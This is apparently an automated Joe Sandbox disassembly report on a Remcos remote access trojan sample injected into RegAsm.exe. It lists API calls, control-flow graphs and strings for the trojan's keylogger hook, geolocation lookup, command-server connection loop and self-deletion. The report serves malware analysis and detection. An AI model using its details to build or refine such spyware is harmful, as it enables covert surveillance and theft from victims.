                                • GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040E9E1), ref: 0041CC4A
                                • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC4D
                                • GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040E9E1), ref: 0041CC5E
                                • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC61
                                • GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040E9E1), ref: 0041CC72
                                • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC75
                                • LoadLibraryA.KERNEL32(Shlwapi), ref: 0041CC83
                                • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC86
                                • LoadLibraryA.KERNEL32(kernel32), ref: 0041CC97
                                • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC9A
                                • GetModuleHandleA.KERNEL32(ntdll,NtSuspendProcess,?,?,?,?,0040E9E1), ref: 0041CCA7
                                • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CCAA
                                • GetModuleHandleA.KERNEL32(ntdll,NtResumeProcess,?,?,?,?,0040E9E1), ref: 0041CCB7
                                • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CCBA
                                • LoadLibraryA.KERNEL32(Iphlpapi), ref: 0041CCCC
                                • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CCCF
                                • LoadLibraryA.KERNEL32(Iphlpapi), ref: 0041CCDC
                                • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CCDF
                                • GetModuleHandleA.KERNEL32(ntdll,NtQueryInformationProcess,?,?,?,?,0040E9E1), ref: 0041CCF0
                                • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CCF3
                                • GetModuleHandleA.KERNEL32(kernel32,GetFinalPathNameByHandleW,?,?,?,?,0040E9E1), ref: 0041CD04
                                • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CD07
                                • LoadLibraryA.KERNEL32(Rstrtmgr), ref: 0041CD19
                                • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CD1C
                                • LoadLibraryA.KERNEL32(Rstrtmgr), ref: 0041CD29
                                • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CD2C
                                • LoadLibraryA.KERNEL32(Rstrtmgr), ref: 0041CD39
                                • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CD3C
                                • LoadLibraryA.KERNEL32(Rstrtmgr), ref: 0041CD49
                                • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CD4C
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressProc$LibraryLoad$HandleModule
                                • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetExtendedTcpTable$GetExtendedUdpTable$GetFinalPathNameByHandleW$GetMonitorInfoW$GetProcessImageFileNameW$GetSystemTimes$GlobalMemoryStatusEx$Iphlpapi$IsUserAnAdmin$IsWow64Process$Kernel32$NtQueryInformationProcess$NtResumeProcess$NtSuspendProcess$NtUnmapViewOfSection$Psapi$RmEndSession$RmGetList$RmRegisterResources$RmStartSession$Rstrtmgr$SetProcessDEPPolicy$SetProcessDpiAwareness$Shell32$Shlwapi$kernel32$ntdll$shcore$user32
                                • API String ID: 4236061018-3687161714
                                • Opcode ID: d30ec231acb52cdcc59a2b6b3fe3a558d95728f00a5c8bab653e1e11384c1c5d
                                • Instruction ID: 43d5c3d51f8f0173c8b3474e0c84bdc355f07b7b5b23ff39ae26555794408ecb
                                • Opcode Fuzzy Hash: d30ec231acb52cdcc59a2b6b3fe3a558d95728f00a5c8bab653e1e11384c1c5d
                                • Instruction Fuzzy Hash: 31419EA0EC035879DA107BB66DCDE3B3E5CD9857953214837B15CA7150EBBCD8408EAE
                                Function 0040A2B8 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 63windowCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1288 40a2b8-40a2cf 1289 40a2d1-40a2eb GetModuleHandleA SetWindowsHookExA 1288->1289 1290 40a333-40a343 GetMessageA 1288->1290 1289->1290 1293 40a2ed-40a331 GetLastError call 41bb8e call 4052fd call 402093 call 41b4ef call 401fd8 1289->1293 1291 40a345-40a35d TranslateMessage DispatchMessageA 1290->1291 1292 40a35f 1290->1292 1291->1290 1291->1292 1294 40a361-40a366 1292->1294 1293->1294
                                APIs
                                • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 0040A2D3
                                • SetWindowsHookExA.USER32(0000000D,0040A2A4,00000000), ref: 0040A2E1
                                • GetLastError.KERNEL32 ref: 0040A2ED
                                  • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                • GetMessageA.USER32 ref: 0040A33B
                                • TranslateMessage.USER32(?), ref: 0040A34A
                                • DispatchMessageA.USER32 ref: 0040A355
                                Strings
                                • Keylogger initialization failure: error , xrefs: 0040A301
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
                                • String ID: Keylogger initialization failure: error
                                • API String ID: 3219506041-952744263
                                • Opcode ID: 24ad775559425fbf79376f518a65b03612fe455b391ecaf03d99fa65814271bc
                                • Instruction ID: 26c2bdf112627336efb266b6f5317542b4ef4d62b82d8858756ad59ca9dca42a
                                • Opcode Fuzzy Hash: 24ad775559425fbf79376f518a65b03612fe455b391ecaf03d99fa65814271bc
                                • Instruction Fuzzy Hash: FA11BF32604301ABCB107F76DC0A86B77ECEA95716B10457EFC85E21D1EA38C910CBAA
                                Function 0041B380 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 69networkfileCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1370 41b380-41b3c3 call 4020df call 43bd51 InternetOpenW InternetOpenUrlW 1375 41b3c5-41b3e6 InternetReadFile 1370->1375 1376 41b3e8-41b408 call 4020b7 call 403376 call 401fd8 1375->1376 1377 41b40c-41b40f 1375->1377 1376->1377 1379 41b411-41b413 1377->1379 1380 41b415-41b422 InternetCloseHandle * 2 call 43bd4c 1377->1380 1379->1375 1379->1380 1384 41b427-41b431 1380->1384
                                APIs
                                • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0041B3A7
                                • InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 0041B3BD
                                • InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 0041B3D6
                                • InternetCloseHandle.WININET(00000000), ref: 0041B41C
                                • InternetCloseHandle.WININET(00000000), ref: 0041B41F
                                Strings
                                • http://geoplugin.net/json.gp, xrefs: 0041B3B7
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: Internet$CloseHandleOpen$FileRead
                                • String ID: http://geoplugin.net/json.gp
                                • API String ID: 3121278467-91888290
                                • Opcode ID: ed6e4750be8d51d583a68a6d75bf3866e9d73d32e6528751d06602238a365c91
                                • Instruction ID: bc766ab0241d3587a1949f89688fbc1c60562a782fd7f61c1deed4db1e92f461
                                • Opcode Fuzzy Hash: ed6e4750be8d51d583a68a6d75bf3866e9d73d32e6528751d06602238a365c91
                                • Instruction Fuzzy Hash: E711EB311053126BD224AB269C49EBF7F9CEF86755F00043EF905A2292DB68DC45C6FA
                                Function 0040F7A7 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 88sleepCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                APIs
                                  • Part of subcall function 00413549: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 00413569
                                  • Part of subcall function 00413549: RegQueryValueExA.KERNEL32 ref: 00413587
                                  • Part of subcall function 00413549: RegCloseKey.KERNEL32(?), ref: 00413592
                                • Sleep.KERNEL32(00000BB8), ref: 0040F85B
                                • ExitProcess.KERNEL32 ref: 0040F8CA
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseExitOpenProcessQuerySleepValue
                                • String ID: 5.0.0 Pro$override$pth_unenc
                                • API String ID: 2281282204-3992771774
                                • Opcode ID: 0c6c273467781de05ac3cf7c04fce85a932ac025a43e79accc6add002e08d8ca
                                • Instruction ID: 07d0e0dc4205ecb16ec703249a4fc897915f305b32a2beb09604d1d6565ffe0f
                                • Opcode Fuzzy Hash: 0c6c273467781de05ac3cf7c04fce85a932ac025a43e79accc6add002e08d8ca
                                • Instruction Fuzzy Hash: F821F371B0420167C604767A485B6AE35A95B80718F90403FF505676D7FF7C8E0583EF
                                Function 00433837 Relevance: 4.5, APIs: 3, Instructions: 30encryptionCOMMON
                                Download Yara Rule
                                APIs
                                • CryptAcquireContextA.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,?,00000000,004334BF,00000034,?,?,0088A1A0), ref: 00433849
                                • CryptGenRandom.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,00433552,00000000,?,00000000), ref: 0043385F
                                • CryptReleaseContext.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,?,00433552,00000000,?,00000000,0041E251), ref: 00433871
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: Crypt$Context$AcquireRandomRelease
                                • String ID:
                                • API String ID: 1815803762-0
                                • Opcode ID: 81ae4bbc27a0383ddd18646ed4cc5f88ed8aa0b0f15284250c3048956b898281
                                • Instruction ID: 864202151b2ab8ebdb17250bb7e2999cce5b6c404a207f59f2405eb254ca80c1
                                • Opcode Fuzzy Hash: 81ae4bbc27a0383ddd18646ed4cc5f88ed8aa0b0f15284250c3048956b898281
                                • Instruction Fuzzy Hash: 83E09231308310FAFB341F25AC08F573AA5EB89B67F20093AF211E40E4D2568C018A5C
                                Function 00448957 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30timeCOMMON
                                Download Yara Rule
                                APIs
                                • GetSystemTimeAsFileTime.KERNEL32(00000000,0043AAB7), ref: 00448996
                                Strings
                                • GetSystemTimePreciseAsFileTime, xrefs: 00448972
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: Time$FileSystem
                                • String ID: GetSystemTimePreciseAsFileTime
                                • API String ID: 2086374402-595813830
                                • Opcode ID: ec0f4eb119bfc3d52cbbcb4ffab675a518ff64a6f359a61470016f4626938150
                                • Instruction ID: 0ece642104574987c61f359f6ab52f67772cb5eafdc88f944851b8b866d171c2
                                • Opcode Fuzzy Hash: ec0f4eb119bfc3d52cbbcb4ffab675a518ff64a6f359a61470016f4626938150
                                • Instruction Fuzzy Hash: 55E0E571A41718E7D710AB259C02E7EBB54DB44B02B10027EFC0957382DE285D0496DE
                                Function 0041B60D Relevance: 1.5, APIs: 1, Instructions: 41COMMON
                                Download Yara Rule
                                APIs
                                • GetUserNameW.ADVAPI32(?,0040F223), ref: 0041B642
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: NameUser
                                • String ID:
                                • API String ID: 2645101109-0
                                • Opcode ID: 9c10d94fd0e958066dbb06410c8ca978aa41ccff27f968e031cf55491574d835
                                • Instruction ID: 2f1a7eaa0fafc1393a04fa3680ad11d69711b7caddb5f837a5711c727b94ccef
                                • Opcode Fuzzy Hash: 9c10d94fd0e958066dbb06410c8ca978aa41ccff27f968e031cf55491574d835
                                • Instruction Fuzzy Hash: 3B014F7190011CABCB01EBD5DC45EEDB7BCAF44309F10016AB505B61A1EFB46E88CBA8
                                Function 00434B47 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                Download Yara Rule
                                APIs
                                • SetUnhandledExceptionFilter.KERNEL32 ref: 00434B4C
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExceptionFilterUnhandled
                                • String ID:
                                • API String ID: 3192549508-0
                                • Opcode ID: 94f820becb3d11eb86a2e9fe35426058ee7de7bf36e1f11b305b7456ad7b3320
                                • Instruction ID: b2b6851a15331e9206a2225a79f218ff0d060d1473a4ca8ef9e7ab7021fb00da
                                • Opcode Fuzzy Hash: 94f820becb3d11eb86a2e9fe35426058ee7de7bf36e1f11b305b7456ad7b3320
                                • Instruction Fuzzy Hash:
                                Function 0040E9C5 Relevance: 86.5, APIs: 15, Strings: 34, Instructions: 795COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 5 40e9c5-40ea47 call 41cb50 GetModuleFileNameW call 40f3c3 call 4020f6 * 2 call 41be1b call 40fb17 call 401e8d call 43fd00 22 40ea93-40eb5b call 401e65 call 401fab call 401e65 call 40531e call 406383 call 401fe2 call 401fd8 * 2 call 401e65 call 401fc0 call 405aa6 call 401e65 call 4051e3 call 401e65 call 4051e3 5->22 23 40ea49-40ea8e call 40fbb3 call 401e65 call 401fab call 410f37 call 40fb64 call 40f3b0 5->23 69 40eb5d-40eba8 call 406c1e call 401fe2 call 401fd8 call 401fab call 413549 22->69 70 40ebae-40ebc9 call 401e65 call 40b9bd 22->70 49 40eef2-40ef03 call 401fd8 23->49 69->70 102 40f34f-40f36a call 401fab call 4139a9 call 412475 69->102 79 40ec03-40ec0a call 40d069 70->79 80 40ebcb-40ebea call 401fab call 413549 70->80 88 40ec13-40ec1a 79->88 89 40ec0c-40ec0e 79->89 80->79 98 40ebec-40ec02 call 401fab call 4139a9 80->98 93 40ec1c 88->93 94 40ec1e-40ec2a call 41b2c3 88->94 92 40eef1 89->92 92->49 93->94 104 40ec33-40ec37 94->104 105 40ec2c-40ec2e 94->105 98->79 126 40f36f-40f3a0 call 41bc5e call 401f04 call 413a23 call 401f09 * 2 102->126 108 40ec76-40ec89 call 401e65 call 401fab 104->108 109 40ec39 call 407716 104->109 105->104 127 40ec90-40ed18 call 401e65 call 41bc5e call 401f13 call 401f09 call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab 108->127 128 40ec8b call 407755 108->128 118 40ec3e-40ec40 109->118 121 40ec42-40ec47 call 407738 call 407260 118->121 122 40ec4c-40ec5f call 401e65 call 401fab 118->122 121->122 122->108 141 40ec61-40ec67 122->141 157 40f3a5-40f3af call 40dd42 call 414f2a 126->157 177 40ed80-40ed84 127->177 178 40ed1a-40ed33 call 401e65 call 401fab call 43bad6 127->178 128->127 141->108 144 40ec69-40ec6f 141->144 144->108 147 40ec71 call 407260 144->147 147->108 179 40ef06-40ef66 call 436e90 call 40247c call 401fab * 2 call 4136f8 call 409057 177->179 180 40ed8a-40ed91 177->180 178->177 203 40ed35-40ed7b call 401e65 call 401fab call 401e65 call 401fab call 40da34 call 401f13 call 401f09 178->203 234 40ef6b-40efbf call 401e65 call 401fab call 402093 call 401fab call 41376f call 401e65 call 401fab call 43baac 179->234 182 40ed93-40ee0d call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 40cdf9 180->182 183 40ee0f-40ee19 call 409057 180->183 193 40ee1e-40ee42 call 40247c call 434798 182->193 183->193 210 40ee51 193->210 211 40ee44-40ee4f call 436e90 193->211 203->177 217 40ee53-40ee9e call 401f04 call 43f809 call 40247c call 401fab call 40247c call 401fab call 413947 210->217 211->217 271 40eea3-40eec8 call 4347a1 call 401e65 call 40b9bd 217->271 286 40efc1 234->286 287 40efdc-40efde 234->287 271->234 288 40eece-40eeed call 401e65 call 41bc5e call 40f474 271->288 289 40efc3-40efda call 41cd9b CreateThread 286->289 290 40efe0-40efe2 287->290 291 40efe4 287->291 288->234 306 40eeef 288->306 294 40efea-40f0c6 call 402093 * 2 call 41b4ef call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 43baac call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab StrToIntA call 409de4 call 401e65 call 401fab 289->294 290->289 291->294 344 40f101 294->344 345 40f0c8-40f0ff call 4344ea call 401e65 call 401fab CreateThread 294->345 306->92 347 40f103-40f11b call 401e65 call 401fab 344->347 345->347 356 40f159-40f16c call 401e65 call 401fab 347->356 357 40f11d-40f154 call 4344ea call 401e65 call 401fab CreateThread 347->357 367 40f1cc-40f1df call 401e65 call 401fab 356->367 368 40f16e-40f1c7 call 401e65 call 401fab call 401e65 call 401fab call 40d9e8 call 401f13 call 401f09 CreateThread 356->368 357->356 379 40f1e1-40f215 call 401e65 call 401fab call 401e65 call 401fab call 43baac call 40c162 367->379 380 40f21a-40f23e call 41b60d call 401f13 call 401f09 367->380 368->367 379->380 400 40f240-40f241 SetProcessDEPPolicy 380->400 401 40f243-40f256 CreateThread 380->401 400->401 404 40f264-40f26b 401->404 405 40f258-40f262 CreateThread 401->405 408 40f279-40f280 404->408 409 40f26d-40f277 CreateThread 404->409 405->404 412 40f282-40f285 408->412 413 40f28e 408->413 409->408 416 40f287-40f28c 412->416 417 40f2cc-40f2df call 401fab call 4134ff 412->417 415 40f293-40f2c7 call 402093 call 4052fd call 402093 call 41b4ef call 401fd8 413->415 415->417 416->415 426 40f2e4-40f2e7 417->426 426->157 428 40f2ed-40f32d call 41bc5e call 401f04 call 41361b call 401f09 call 401f04 426->428 443 40f346-40f34b DeleteFileW 428->443 444 40f34d 443->444 445 40f32f-40f332 443->445 444->126 445->126 446 40f334-40f341 Sleep call 401f04 445->446 446->443
                                APIs
                                  • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(Psapi), ref: 0041CB65
                                  • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CB6E
                                  • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040E9E1), ref: 0041CB85
                                  • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CB88
                                  • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(shcore), ref: 0041CB9A
                                  • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CB9D
                                  • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(user32), ref: 0041CBAE
                                  • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CBB1
                                  • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(ntdll), ref: 0041CBC3
                                  • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CBC6
                                  • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(kernel32), ref: 0041CBD2
                                  • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CBD5
                                  • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040E9E1), ref: 0041CBE6
                                  • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CBE9
                                  • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040E9E1), ref: 0041CBFA
                                  • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CBFD
                                  • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(Shell32), ref: 0041CC0E
                                  • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC11
                                  • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040E9E1), ref: 0041CC22
                                  • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC25
                                  • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040E9E1), ref: 0041CC36
                                  • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC39
                                  • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040E9E1), ref: 0041CC4A
                                  • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC4D
                                  • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040E9E1), ref: 0041CC5E
                                  • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC61
                                  • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040E9E1), ref: 0041CC72
                                  • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC75
                                  • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(Shlwapi), ref: 0041CC83
                                • GetModuleFileNameW.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000104), ref: 0040E9EE
                                  • Part of subcall function 00410F37: __EH_prolog.LIBCMT ref: 00410F3C
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressProc$Module$Handle$LibraryLoad$FileH_prologName
                                • String ID: SG$ SG$8SG$8SG$Access Level: $Administrator$C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$Exe$Inj$PSG$Remcos Agent initialized$Software\$User$dMG$del$del$exepath$licence$license_code.txt$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG
                                • API String ID: 2830904901-3701325316
                                • Opcode ID: 747d405c528f15ab38f340b499f6c8eb85ced7579b397f1517eaf58dd5f7f014
                                • Instruction ID: d4e128c763ae9979da4f7e35a5cae12564b96cb69b39ecb6445d524eb2b23fe8
                                • Opcode Fuzzy Hash: 747d405c528f15ab38f340b499f6c8eb85ced7579b397f1517eaf58dd5f7f014
                                • Instruction Fuzzy Hash: 6332D860B043412BDA24B7729C67B6E26994F81748F50483FB9467B2E3EFBC4D45839E
                                Function 00414F2A Relevance: 46.3, APIs: 5, Strings: 21, Instructions: 809sleepnetworkCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 448 414f2a-414f72 call 4020df call 41b8b3 call 4020df call 401e65 call 401fab call 43baac 461 414f81-414fcd call 402093 call 401e65 call 4020f6 call 41be1b call 40489e call 401e65 call 40b9bd 448->461 462 414f74-414f7b Sleep 448->462 477 415041-4150dc call 402093 call 401e65 call 4020f6 call 41be1b call 401e65 * 2 call 406c1e call 402f10 call 401fe2 call 401fd8 * 2 call 401e65 call 405b05 461->477 478 414fcf-41503e call 401e65 call 40247c call 401e65 call 401fab call 401e65 call 40247c call 401e65 call 401fab call 401e65 call 40247c call 401e65 call 401fab call 40473d 461->478 462->461 531 4150ec-4150f3 477->531 532 4150de-4150ea 477->532 478->477 533 4150f8-41518a call 405aa6 call 40531e call 406383 call 402f10 call 402093 call 41b4ef call 401fd8 * 2 call 401e65 call 401fab call 401e65 call 401fab call 414ee9 531->533 532->533 560 4151d5-4151e3 call 40482d 533->560 561 41518c-4151d0 WSAGetLastError call 41cae1 call 4052fd call 402093 call 41b4ef call 401fd8 533->561 566 415210-415225 call 404f51 call 4048c8 560->566 567 4151e5-41520b call 402093 * 2 call 41b4ef 560->567 581 415aa3-415ab5 call 404e26 call 4021fa 561->581 566->581 582 41522b-41537e call 401e65 * 2 call 40531e call 406383 call 402f10 call 406383 call 402f10 call 402093 call 41b4ef call 401fd8 * 4 call 41b7e0 call 4145bd call 40905c call 441e81 call 401e65 call 4020f6 call 40247c call 401fab * 2 call 4136f8 566->582 567->581 597 415ab7-415ad7 call 401e65 call 401fab call 43baac Sleep 581->597 598 415add-415ae5 call 401e8d 581->598 648 415380-41538d call 405aa6 582->648 649 415392-4153b9 call 401fab call 4135a6 582->649 597->598 598->477 648->649 655 4153c0-41577f call 40417e call 40dd89 call 41bc42 call 41bd1e call 41bb8e call 401e65 GetTickCount call 41bb8e call 41bae6 call 41bb8e * 2 call 41ba96 call 41bd1e * 5 call 40f8d1 call 41bd1e call 402f31 call 402ea1 call 402f10 call 402ea1 call 402f10 * 3 call 402ea1 call 402f10 call 406383 call 402f10 call 406383 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 406383 call 402f10 * 5 call 402ea1 call 402f10 call 402ea1 call 402f10 * 7 call 402ea1 649->655 656 4153bb-4153bd 649->656 782 415781 call 404aa1 655->782 656->655 783 415786-415a0a call 401fd8 * 50 call 401f09 call 401fd8 * 6 call 401f09 call 404c10 782->783 901 415a0f-415a16 783->901 902 415a18-415a1f 901->902 903 415a2a-415a31 901->903 902->903 904 415a21-415a23 902->904 905 415a33-415a38 call 40b051 903->905 906 415a3d-415a6f call 405a6b call 402093 * 2 call 41b4ef 903->906 904->903 905->906 917 415a71-415a7d CreateThread 906->917 918 415a83-415a9e call 401fd8 * 2 call 401f09 906->918 917->918 918->581
                                APIs
                                • Sleep.KERNEL32(00000000,00000029,004752F0,004750E4,00000000), ref: 00414F7B
                                • WSAGetLastError.WS2_32(00000000,00000001), ref: 0041518C
                                • Sleep.KERNEL32(00000000,00000002), ref: 00415AD7
                                  • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: Sleep$ErrorLastLocalTime
                                • String ID: | $%I64u$5.0.0 Pro$8SG$C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$Connected | $Connecting | $Connection Error: $Connection Error: Unable to create socket$Disconnected$PSG$TLS Off$TLS On $dMG$hlight$name$NG$NG$PG$PG$PG
                                • API String ID: 524882891-2158775120
                                • Opcode ID: 56683a9eb9910acecfc69af6d97ab0238db08a14bf25ad7c321f103857c25174
                                • Instruction ID: 324fc11d7bea0fba9c16e2c7d7b547a311b01f704130931fc4cc70caa797af2d
                                • Opcode Fuzzy Hash: 56683a9eb9910acecfc69af6d97ab0238db08a14bf25ad7c321f103857c25174
                                • Instruction Fuzzy Hash: 22526B31A001155ACB18F732DD96AFE73769F90344F6041BFE40A761E2EF781E858A5D
                                Function 00414D86 Relevance: 24.6, APIs: 9, Strings: 5, Instructions: 109libraryloaderCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
